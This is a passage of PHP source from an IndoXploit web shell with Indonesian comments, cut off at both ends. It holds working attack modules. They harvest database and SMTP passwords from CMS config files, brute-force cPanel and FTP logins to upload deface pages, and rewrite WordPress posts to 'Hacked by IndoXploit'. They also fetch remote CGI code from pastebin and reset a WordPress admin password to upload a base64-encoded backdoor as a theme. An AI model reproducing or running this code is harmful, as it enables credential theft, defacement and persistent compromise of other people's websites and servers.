  704. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  705. $user_cp_url = $user_cp_url['name'];
  706. if($user_cp_url == $ucp) {
  707. $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
  708. break;
  709. }
  710. }
  711. }
  712. } else {
  713. $dom = "<font color=red>function is Disable by system</font>";
  714. }
  715. echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
  716. }
  717. }
  718. }
  719. }
  720. }
  721. if($i == 0) {
  722. } else {
  723. echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>IndoXploit.</font>";
  724. }
  725. } else {
  726. echo "<center>
  727. <form method='post'>
  728. USER: <br>
  729. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  730. $_usercp = fopen("/etc/passwd","r");
  731. while($getu = fgets($_usercp)) {
  732. if($getu == '' || !$_usercp) {
  733. echo "<font color=red>Can't read /etc/passwd</font>";
  734. } else {
  735. preg_match_all("/(.*?):x:/", $getu, $u);
  736. foreach($u[1] as $user_cp) {
  737. if(is_dir("/home/$user_cp/public_html")) {
  738. echo "$user_cp\n";
  739. }
  740. }
  741. }
  742. }
  743. echo "</textarea><br>
  744. PASS: <br>
  745. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  746. function cp_pass($dir) {
  747. $pass = "";
  748. $dira = scandir($dir);
  749. foreach($dira as $dirb) {
  750. if(!is_file("$dir/$dirb")) continue;
  751. $ambil = file_get_contents("$dir/$dirb");
  752. if(preg_match("/WordPress/", $ambil)) {
  753. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  754. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  755. $pass .= ambilkata($ambil,"password = '","'")."\n";
  756. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  757. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  758. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  759. $pass .= ambilkata($ambil,'password = "','"')."\n";
  760. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  761. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  762. } elseif(preg_match("/client/", $ambil)) {
  763. preg_match("/password=(.*)/", $ambil, $pass1);
  764. if(preg_match('/"/', $pass1[1])) {
  765. $pass1[1] = str_replace('"', "", $pass1[1]);
  766. $pass .= $pass1[1]."\n";
  767. }
  768. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  769. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  770. }
  771. }
  772. echo $pass;
  773. }
  774. $cp_pass = cp_pass($dir);
  775. echo $cp_pass;
  776. echo "</textarea><br>
  777. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  778. </form>
  779. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  780. }
  781. } elseif($_GET['do'] == 'cpftp_auto') {
  782. if($_POST['crack']) {
  783. $usercp = explode("\r\n", $_POST['user_cp']);
  784. $passcp = explode("\r\n", $_POST['pass_cp']);
  785. $i = 0;
  786. foreach($usercp as $ucp) {
  787. foreach($passcp as $pcp) {
  788. if(@mysql_connect('localhost', $ucp, $pcp)) {
  789. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  790. } else {
  791. $_SESSION[$ucp] = "1";
  792. $_SESSION[$pcp] = "1";
  793. if($ucp == '' || $pcp == '') {
  794. //
  795. } else {
  796. echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  797. $ftp_conn = ftp_connect(gethostbyname($_SERVER['HTTP_HOST']));
  798. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  799. if((!$ftp_login) || (!$ftp_conn)) {
  800. echo "[+] <font color=red>Login Gagal</font><br><br>";
  801. } else {
  802. echo "[+] <font color=lime>Login Sukses</font><br>";
  803. $fi = htmlspecialchars($_POST['file_deface']);
  804. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  805. if($deface) {
  806. $i++;
  807. echo "[+] <font color=lime>Deface Sukses</font><br>";
  808. if(function_exists('posix_getpwuid')) {
  809. $domain_cp = file_get_contents("/etc/named.conf");
  810. if($domain_cp == '') {
  811. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  812. } else {
  813. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  814. foreach($domains_cp[1] as $dj) {
  815. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  816. $user_cp_url = $user_cp_url['name'];
  817. if($user_cp_url == $ucp) {
  818. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  819. break;
  820. }
  821. }
  822. }
  823. } else {
  824. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  825. }
  826. } else {
  827. echo "[-] <font color=red>Deface Gagal</font><br><br>";
  828. }
  829. }
  830. //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  831. }
  832. }
  833. }
  834. }
  835. }
  836. if($i == 0) {
  837. } else {
  838. echo "<br>sukses deface ".$i." Cpanel by <font color=lime>IndoXploit.</font>";
  839. }
  840. } else {
  841. echo "<center>
  842. <form method='post'>
  843. Filename: <br>
  844. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  845. Deface Page: <br>
  846. <input type='text' name='deface' placeholder='http://www.web-yang-udah-do-deface.com/filemu.php' style='width: 450px;'><br>
  847. USER: <br>
  848. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  849. $_usercp = fopen("/etc/passwd","r");
  850. while($getu = fgets($_usercp)) {
  851. if($getu == '' || !$_usercp) {
  852. echo "<font color=red>Can't read /etc/passwd</font>";
  853. } else {
  854. preg_match_all("/(.*?):x:/", $getu, $u);
  855. foreach($u[1] as $user_cp) {
  856. if(is_dir("/home/$user_cp/public_html")) {
  857. echo "$user_cp\n";
  858. }
  859. }
  860. }
  861. }
  862. echo "</textarea><br>
  863. PASS: <br>
  864. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  865. function cp_pass($dir) {
  866. $pass = "";
  867. $dira = scandir($dir);
  868. foreach($dira as $dirb) {
  869. if(!is_file("$dir/$dirb")) continue;
  870. $ambil = file_get_contents("$dir/$dirb");
  871. if(preg_match("/WordPress/", $ambil)) {
  872. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  873. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  874. $pass .= ambilkata($ambil,"password = '","'")."\n";
  875. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  876. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  877. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  878. $pass .= ambilkata($ambil,'password = "','"')."\n";
  879. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  880. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  881. } elseif(preg_match("/client/", $ambil)) {
  882. preg_match("/password=(.*)/", $ambil, $pass1);
  883. if(preg_match('/"/', $pass1[1])) {
  884. $pass1[1] = str_replace('"', "", $pass1[1]);
  885. $pass .= $pass1[1]."\n";
  886. }
  887. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  888. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  889. }
  890. }
  891. echo $pass;
  892. }
  893. $cp_pass = cp_pass($dir);
  894. echo $cp_pass;
  895. echo "</textarea><br>
  896. <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
  897. </form>
  898. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  899. }
  900. } elseif($_GET['do'] == 'smtp') {
  901. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  902. function scj($dir) {
  903. $dira = scandir($dir);
  904. foreach($dira as $dirb) {
  905. if(!is_file("$dir/$dirb")) continue;
  906. $ambil = file_get_contents("$dir/$dirb");
  907. $ambil = str_replace("$", "", $ambil);
  908. if(preg_match("/JConfig|joomla/", $ambil)) {
  909. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  910. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  911. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  912. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  913. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  914. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  915. echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
  916. echo "SMTP port: <font color=lime>$smtp_port</font><br>";
  917. echo "SMTP user: <font color=lime>$smtp_user</font><br>";
  918. echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
  919. echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
  920. echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
  921. }
  922. }
  923. }
  924. $smpt_hunter = scj($dir);
  925. echo $smpt_hunter;
  926. } elseif($_GET['do'] == 'auto_wp') {
  927. if($_POST['hajar']) {
  928. $title = htmlspecialchars($_POST['new_title']);
  929. $pn_title = str_replace(" ", "-", $title);
  930. if($_POST['cek_edit'] == "Y") {
  931. $script = $_POST['edit_content'];
  932. } else {
  933. $script = $title;
  934. }
  935. $conf = $_POST['config_dir'];
  936. $scan_conf = scandir($conf);
  937. foreach($scan_conf as $file_conf) {
  938. if(!is_file("$conf/$file_conf")) continue;
  939. $config = file_get_contents("$conf/$file_conf");
  940. if(preg_match("/WordPress/", $config)) {
  941. $dbhost = ambilkata($config,"DB_HOST', '","'");
  942. $dbuser = ambilkata($config,"DB_USER', '","'");
  943. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  944. $dbname = ambilkata($config,"DB_NAME', '","'");
  945. $dbprefix = ambilkata($config,"table_prefix = '","'");
  946. $prefix = $dbprefix."posts";
  947. $option = $dbprefix."options";
  948. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  949. $db = mysql_select_db($dbname);
  950. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  951. $result = mysql_fetch_array($q);
  952. $id = $result[ID];
  953. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  954. $result2 = mysql_fetch_array($q2);
  955. $target = $result2[option_value];
  956. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  957. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  958. echo "<div style='margin: 5px auto;'>";
  959. if($target == '') {
  960. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  961. } else {
  962. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  963. }
  964. if(!$update OR !$conn OR !$db) {
  965. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  966. } else {
  967. echo "<font color=lime>sukses di ganti.</font><br>";
  968. }
  969. echo "</div>";
  970. mysql_close($conn);
  971. }
  972. }
  973. } else {
  974. echo "<center>
  975. <h1>Auto Edit Title+Content WordPress</h1>
  976. <form method='post'>
  977. DIR Config: <br>
  978. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  979. Set Title: <br>
  980. <input type='text' name='new_title' value='Hacked by IndoXploit' placeholder='New Title'><br><br>
  981. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  982. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  983. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  984. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  985. </form>
  986. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  987. ";
  988. }
  989. } elseif($_GET['do'] == 'zoneh') {
  990. if($_POST['submit']) {
  991. $domain = explode("\r\n", $_POST['url']);
  992. $nick = $_POST['nick'];
  993. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  994. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  995. function zoneh($url,$nick) {
  996. $ch = curl_init("http://www.zone-h.com/notify/single");
  997. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  998. curl_setopt($ch, CURLOPT_POST, true);
  999. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  1000. return curl_exec($ch);
  1001. curl_close($ch);
  1002. }
  1003. foreach($domain as $url) {
  1004. $zoneh = zoneh($url,$nick);
  1005. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  1006. echo "$url -> <font color=lime>OK</font><br>";
  1007. } else {
  1008. echo "$url -> <font color=red>ERROR</font><br>";
  1009. }
  1010. }
  1011. } else {
  1012. echo "<center><form method='post'>
  1013. <u>Defacer</u>: <br>
  1014. <input type='text' name='nick' size='50' value='IndoXploit'><br>
  1015. <u>Domains</u>: <br>
  1016. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  1017. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  1018. </form>";
  1019. }
  1020. echo "</center>";
  1021. } elseif($_GET['do'] == 'cgi') {
  1022. $cgi_dir = mkdir('idx_cgi', 0755);
  1023. $file_cgi = "idx_cgi/cgi.izo";
  1024. $isi_htcgi = "AddHandler cgi-script .izo";
  1025. $htcgi = fopen(".htaccess", "w");
  1026. $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
  1027. $cgi = fopen($file_cgi, "w");
  1028. fwrite($cgi, $cgi_script);
  1029. fwrite($htcgi, $isi_htcgi);
  1030. chmod($file_cgi, 0755);
  1031. echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  1032. } elseif($_GET['do'] == 'fake_root') {
  1033. ob_start();
  1034. function reverse($url) {
  1035. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  1036. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  1037. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
  1038. curl_setopt($ch, CURLOPT_HEADER, 0);
  1039. curl_setopt($ch, CURLOPT_POST, 1);
  1040. $resp = curl_exec($ch);
  1041. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  1042. $array = explode(",,", $resp);
  1043. unset($array[0]);
  1044. foreach($array as $lnk) {
  1045. $lnk = "http://$lnk";
  1046. $lnk = str_replace(",", "", $lnk);
  1047. echo $lnk."\n";
  1048. ob_flush();
  1049. flush();
  1050. }
  1051. curl_close($ch);
  1052. }
  1053. function cek($url) {
  1054. $ch = curl_init($url);
  1055. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  1056. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  1057. $resp = curl_exec($ch);
  1058. return $resp;
  1059. }
  1060. $cwd = getcwd();
  1061. $ambil_user = explode("/", $cwd);
  1062. $user = $ambil_user[2];
  1063. if($_POST['reverse']) {
  1064. $site = explode("\r\n", $_POST['url']);
  1065. $file = $_POST['file'];
  1066. foreach($site as $url) {
  1067. $cek = cek("$url/~$user/$file");
  1068. if(preg_match("/hacked/i", $cek)) {
  1069. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
  1070. }
  1071. }
  1072. } else {
  1073. echo "<center><form method='post'>
  1074. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  1075. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  1076. Domain: <br>
  1077. <textarea style='width: 450px; height: 250px;' name='url'>";
  1078. reverse($_SERVER['HTTP_HOST']);
  1079. echo "</textarea><br>
  1080. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  1081. </form><br>
  1082. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  1083. }
  1084. } elseif($_GET['do'] == 'adminer') {
  1085. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1086. function adminer($url, $isi) {
  1087. $fp = fopen($isi, "w");
  1088. $ch = curl_init();
  1089. curl_setopt($ch, CURLOPT_URL, $url);
  1090. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1091. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1092. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1093. curl_setopt($ch, CURLOPT_FILE, $fp);
  1094. return curl_exec($ch);
  1095. curl_close($ch);
  1096. fclose($fp);
  1097. ob_flush();
  1098. flush();
  1099. }
  1100. if(file_exists('adminer.php')) {
  1101. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1102. } else {
  1103. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  1104. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1105. } else {
  1106. echo "<center><font color=red>gagal buat file adminer</font></center>";
  1107. }
  1108. }
  1109. } elseif($_GET['do'] == 'auto_dwp') {
  1110. if($_POST['auto_deface_wp']) {
  1111. function anucurl($sites) {
  1112. $ch = curl_init($sites);
  1113. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1114. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1115. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1116. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1117. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1118. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1119. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1120. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1121. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1122. $data = curl_exec($ch);
  1123. curl_close($ch);
  1124. return $data;
  1125. }
  1126. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  1127. $post = array(
  1128. "log" => "$userr",
  1129. "pwd" => "$pass",
  1130. "rememberme" => "forever",
  1131. "wp-submit" => "$wp_submit",
  1132. "redirect_to" => "$web",
  1133. "testcookie" => "1",
  1134. );
  1135. $ch = curl_init($cek);
  1136. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1137. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1138. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1139. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1140. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1141. curl_setopt($ch, CURLOPT_POST, 1);
  1142. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1143. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1144. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1145. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1146. $data = curl_exec($ch);
  1147. curl_close($ch);
  1148. return $data;
  1149. }
  1150. $scan = $_POST['link_config'];
  1151. $link_config = scandir($scan);
  1152. $script = htmlspecialchars($_POST['script']);
  1153. $user = "indoxploit";
  1154. $pass = "indoxploit";
  1155. $passx = md5($pass);
  1156. foreach($link_config as $dir_config) {
  1157. if(!is_file("$scan/$dir_config")) continue;
  1158. $config = file_get_contents("$scan/$dir_config");
  1159. if(preg_match("/WordPress/", $config)) {
  1160. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1161. $dbuser = ambilkata($config,"DB_USER', '","'");
  1162. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1163. $dbname = ambilkata($config,"DB_NAME', '","'");
  1164. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1165. $prefix = $dbprefix."users";
  1166. $option = $dbprefix."options";
  1167. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1168. $db = mysql_select_db($dbname);
  1169. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1170. $result = mysql_fetch_array($q);
  1171. $id = $result[ID];
  1172. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1173. $result2 = mysql_fetch_array($q2);
  1174. $target = $result2[option_value];
  1175. if($target == '') {
  1176. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1177. } else {
  1178. echo "[+] $target <br>";
  1179. }
  1180. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1181. if(!$conn OR !$db OR !$update) {
  1182. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1183. mysql_close($conn);
  1184. } else {
  1185. $site = "$target/wp-login.php";
  1186. $site2 = "$target/wp-admin/theme-install.php?upload";
  1187. $b1 = anucurl($site2);
  1188. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  1189. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  1190. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  1191. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  1192. $www = "m.php";
  1193. $fp5 = fopen($www,"w");
  1194. fputs($fp5,$upload3);
  1195. $post2 = array(
  1196. "_wpnonce" => "$anu2",
  1197. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  1198. "themezip" => "@$www",
  1199. "install-theme-submit" => "Install Now",
  1200. );
  1201. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  1202. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1203. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1204. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1205. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1206. curl_setopt($ch, CURLOPT_POST, 1);
  1207. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  1208. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1209. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1210. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1211. $data3 = curl_exec($ch);
  1212. curl_close($ch);
  1213. $y = date("Y");
  1214. $m = date("m");
  1215. $namafile = "id.php";
  1216. $fpi = fopen($namafile,"w");
  1217. fputs($fpi,$script);
  1218. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  1219. curl_setopt($ch6, CURLOPT_POST, true);
  1220. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  1221. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  1222. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  1223. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  1224. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  1225. $postResult = curl_exec($ch6);
  1226. curl_close($ch6);
  1227. $as = "$target/k.php";
  1228. $bs = anucurl($as);
  1229. if(preg_match("#$script#is", $bs)) {
  1230. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  1231. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  1232. } else {
  1233. echo "[-] <font color='red'>gagal mepes...</font><br>";
  1234. echo "[!!] coba aja manual: <br>";
  1235. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1236. echo "[+] username: <font color=lime>$user</font><br>";
  1237. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1238. }
  1239. mysql_close($conn);
  1240. }
  1241. }
  1242. }
  1243. } else {
  1244. echo "<center><h1>WordPress Auto Deface</h1>
  1245. <form method='post'>
  1246. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  1247. <input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' required><br>
  1248. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  1249. </form>
  1250. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  1251. </center>";
  1252. }
  1253. } elseif($_GET['do'] == 'auto_dwp2') {
  1254. if($_POST['auto_deface_wp']) {
  1255. function anucurl($sites) {
  1256. $ch = curl_init($sites);
  1257. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1258. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1259. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1260. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1261. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1262. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1263. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1264. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1265. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1266. $data = curl_exec($ch);
  1267. curl_close($ch);
  1268. return $data;
  1269. }
  1270. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  1271. $post = array(
  1272. "log" => "$userr",
  1273. "pwd" => "$pass",
  1274. "rememberme" => "forever",
  1275. "wp-submit" => "$wp_submit",
  1276. "redirect_to" => "$web",
  1277. "testcookie" => "1",
  1278. );
  1279. $ch = curl_init($cek);
  1280. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1281. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1282. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1283. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1284. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1285. curl_setopt($ch, CURLOPT_POST, 1);
  1286. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1287. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1288. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1289. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1290. $data = curl_exec($ch);
  1291. curl_close($ch);
  1292. return $data;
  1293. }
  1294. $link = explode("\r\n", $_POST['link']);
  1295. $script = htmlspecialchars($_POST['script']);
  1296. $user = "indoxploit";
  1297. $pass = "indoxploit";
  1298. $passx = md5($pass);
  1299. foreach($link as $dir_config) {
  1300. $config = anucurl($dir_config);
  1301. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1302. $dbuser = ambilkata($config,"DB_USER', '","'");
  1303. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1304. $dbname = ambilkata($config,"DB_NAME', '","'");
  1305. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1306. $prefix = $dbprefix."users";
  1307. $option = $dbprefix."options";
  1308. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1309. $db = mysql_select_db($dbname);
  1310. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1311. $result = mysql_fetch_array($q);
  1312. $id = $result[ID];
  1313. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1314. $result2 = mysql_fetch_array($q2);
  1315. $target = $result2[option_value];
  1316. if($target == '') {
  1317. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1318. } else {
  1319. echo "[+] $target <br>";
  1320. }
  1321. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1322. if(!$conn OR !$db OR !$update) {
  1323. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1324. mysql_close($conn);
  1325. } else {
